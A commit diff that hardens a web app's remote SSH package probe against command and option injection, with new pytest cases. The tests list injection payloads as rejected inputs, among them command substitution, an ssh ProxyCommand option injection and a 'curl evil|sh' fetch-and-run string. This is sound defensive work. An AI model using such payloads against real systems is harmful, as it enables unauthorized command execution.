Harden Cookbook package SSH probe
This commit is contained in:
@@ -4,6 +4,7 @@ import asyncio
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import shlex
|
||||
import shutil
|
||||
import subprocess
|
||||
@@ -57,6 +58,40 @@ def _require_admin(request: Request):
|
||||
if not auth_manager.is_admin(user):
|
||||
raise HTTPException(403, "Admin only")
|
||||
|
||||
|
||||
def _reject_cross_site(request: Request):
|
||||
"""Reject browser cross-site navigations to shell-touching endpoints."""
|
||||
if request.headers.get("sec-fetch-site") == "cross-site":
|
||||
raise HTTPException(403, "Cross-site request rejected")
|
||||
|
||||
|
||||
_SSH_PORT_RE = re.compile(r"^\d{1,5}$")
|
||||
_SAFE_VENV_RE = re.compile(r"^[A-Za-z0-9_./~-]+$")
|
||||
|
||||
|
||||
def _ssh_base_argv(host: str, ssh_port: str | None) -> list[str]:
|
||||
"""Build an ssh argv prefix for remote probes without local-shell parsing."""
|
||||
if not host or not str(host).strip() or str(host).lstrip().startswith("-"):
|
||||
raise ValueError("invalid ssh host")
|
||||
argv = ["ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no"]
|
||||
if ssh_port and str(ssh_port).strip() not in ("", "22"):
|
||||
port = str(ssh_port).strip()
|
||||
if not _SSH_PORT_RE.match(port) or not (1 <= int(port) <= 65535):
|
||||
raise ValueError("invalid ssh port")
|
||||
argv += ["-p", port]
|
||||
argv.append(str(host).strip())
|
||||
return argv
|
||||
|
||||
|
||||
def _venv_activate_prefix(venv: str | None) -> str:
|
||||
"""Return a remote activation prefix while preserving shell expansion of ~."""
|
||||
if not venv:
|
||||
return ""
|
||||
if not _SAFE_VENV_RE.match(venv):
|
||||
raise ValueError("invalid venv path")
|
||||
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
|
||||
return f". {act} && "
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
PTY_SUPPORTED = pty is not None and fcntl is not None and hasattr(os, "setsid")
|
||||
@@ -755,13 +790,12 @@ def setup_shell_routes() -> APIRouter:
|
||||
never reflected because the check only ever looked at the local host.
|
||||
"""
|
||||
_require_admin(request)
|
||||
_reject_cross_site(request)
|
||||
import importlib, importlib.metadata as importlib_metadata, shlex, json as _json
|
||||
port_arg = ""
|
||||
if ssh_port and str(ssh_port).strip() not in ("", "22"):
|
||||
_port = str(ssh_port).strip()
|
||||
if not _port.isdigit():
|
||||
if not _SSH_PORT_RE.match(_port) or not (1 <= int(_port) <= 65535):
|
||||
raise HTTPException(400, "Invalid ssh_port")
|
||||
port_arg = f"-p {int(_port)} "
|
||||
packages = [
|
||||
# ── System ── OS binaries, not pip packages
|
||||
{"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."},
|
||||
@@ -787,20 +821,13 @@ def setup_shell_routes() -> APIRouter:
|
||||
if host and remote_names:
|
||||
try:
|
||||
py = _package_probe_script(remote_names)
|
||||
src = ""
|
||||
if venv:
|
||||
act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate"
|
||||
# NOT shlex.quoted: a leading ~ must stay shell-expandable on
|
||||
# the remote (quoting it breaks `~/venv` → activation fails →
|
||||
# the && short-circuits and every package reads as missing).
|
||||
src = f". {act} && "
|
||||
# `venv` is validated but left unquoted so leading ~ expands on
|
||||
# the remote; quoting it breaks ~/venv activation.
|
||||
src = _venv_activate_prefix(venv)
|
||||
inner = f"{src}python3 -c {shlex.quote(py)}"
|
||||
ssh_cmd = (
|
||||
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
|
||||
f"{shlex.quote(host)} {shlex.quote(inner)}"
|
||||
)
|
||||
proc = await asyncio.create_subprocess_shell(
|
||||
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||
argv = _ssh_base_argv(host, ssh_port) + [inner]
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||
)
|
||||
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
||||
txt = out.decode("utf-8", errors="replace").strip()
|
||||
@@ -815,6 +842,8 @@ def setup_shell_routes() -> APIRouter:
|
||||
if isinstance(probe, dict)
|
||||
}
|
||||
break
|
||||
except ValueError as e:
|
||||
raise HTTPException(400, str(e))
|
||||
except Exception:
|
||||
remote_status = {}
|
||||
if host and remote_system_names:
|
||||
@@ -824,12 +853,9 @@ def setup_shell_routes() -> APIRouter:
|
||||
qn = shlex.quote(name)
|
||||
checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi")
|
||||
inner = " ; ".join(checks)
|
||||
ssh_cmd = (
|
||||
f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}"
|
||||
f"{shlex.quote(host)} {shlex.quote(inner)}"
|
||||
)
|
||||
proc = await asyncio.create_subprocess_shell(
|
||||
ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||
argv = _ssh_base_argv(host, ssh_port) + [inner]
|
||||
proc = await asyncio.create_subprocess_exec(
|
||||
*argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
|
||||
)
|
||||
out, _err = await asyncio.wait_for(proc.communicate(), timeout=12)
|
||||
txt = out.decode("utf-8", errors="replace").strip()
|
||||
@@ -837,6 +863,8 @@ def setup_shell_routes() -> APIRouter:
|
||||
name, sep, value = line.strip().partition("=")
|
||||
if sep and name in remote_system_names:
|
||||
remote_status[name] = value == "1"
|
||||
except ValueError as e:
|
||||
raise HTTPException(400, str(e))
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
|
||||
@@ -7,12 +7,17 @@ import sys
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
|
||||
import pytest
|
||||
|
||||
from routes.shell_routes import (
|
||||
_find_line_break,
|
||||
_running_in_container,
|
||||
_docker_row_status,
|
||||
_package_installed_from_probe,
|
||||
_package_status_note,
|
||||
_reject_cross_site,
|
||||
_ssh_base_argv,
|
||||
_venv_activate_prefix,
|
||||
DOCKER_IN_CONTAINER_HINT,
|
||||
)
|
||||
|
||||
@@ -241,3 +246,76 @@ class TestPackageProbeStatus:
|
||||
|
||||
assert _package_installed_from_probe("diffusers", missing_torch) is False
|
||||
assert _package_installed_from_probe("diffusers", ready) is True
|
||||
|
||||
|
||||
class TestSshBaseArgv:
|
||||
def test_basic_host_no_port(self):
|
||||
assert _ssh_base_argv("user@example.com", None) == [
|
||||
"ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no",
|
||||
"user@example.com",
|
||||
]
|
||||
|
||||
def test_default_port_22_omitted(self):
|
||||
assert "-p" not in _ssh_base_argv("h", "22")
|
||||
assert "-p" not in _ssh_base_argv("h", "")
|
||||
assert "-p" not in _ssh_base_argv("h", None)
|
||||
|
||||
def test_custom_port_added_as_separate_argv(self):
|
||||
assert _ssh_base_argv("h", "2222")[-3:] == ["-p", "2222", "h"]
|
||||
|
||||
@pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"])
|
||||
def test_bad_port_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv("h", bad)
|
||||
|
||||
def test_option_injecting_host_rejected(self):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None)
|
||||
|
||||
@pytest.mark.parametrize("bad", ["", " ", None])
|
||||
def test_empty_host_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_ssh_base_argv(bad, None)
|
||||
|
||||
|
||||
class TestVenvActivatePrefix:
|
||||
def test_empty_returns_blank(self):
|
||||
assert _venv_activate_prefix(None) == ""
|
||||
assert _venv_activate_prefix("") == ""
|
||||
|
||||
def test_appends_bin_activate(self):
|
||||
assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && "
|
||||
|
||||
def test_already_pointing_at_activate(self):
|
||||
assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && "
|
||||
|
||||
@pytest.mark.parametrize("bad", [
|
||||
"/opt/v && curl evil|sh",
|
||||
"$(id)",
|
||||
"`id`",
|
||||
"v;id",
|
||||
"v\nid",
|
||||
"v|id",
|
||||
])
|
||||
def test_injection_payloads_rejected(self, bad):
|
||||
with pytest.raises(ValueError):
|
||||
_venv_activate_prefix(bad)
|
||||
|
||||
|
||||
class TestRejectCrossSite:
|
||||
@staticmethod
|
||||
def _req(headers):
|
||||
return SimpleNamespace(headers=headers)
|
||||
|
||||
def test_cross_site_rejected(self):
|
||||
from fastapi import HTTPException
|
||||
with pytest.raises(HTTPException) as exc:
|
||||
_reject_cross_site(self._req({"sec-fetch-site": "cross-site"}))
|
||||
assert exc.value.status_code == 403
|
||||
|
||||
@pytest.mark.parametrize("site", ["same-origin", "same-site", "none"])
|
||||
def test_same_origin_and_direct_nav_allowed(self, site):
|
||||
assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None
|
||||
|
||||
def test_missing_header_allowed(self):
|
||||
assert _reject_cross_site(self._req({})) is None
|
||||
|
||||
Reference in New Issue
Block a user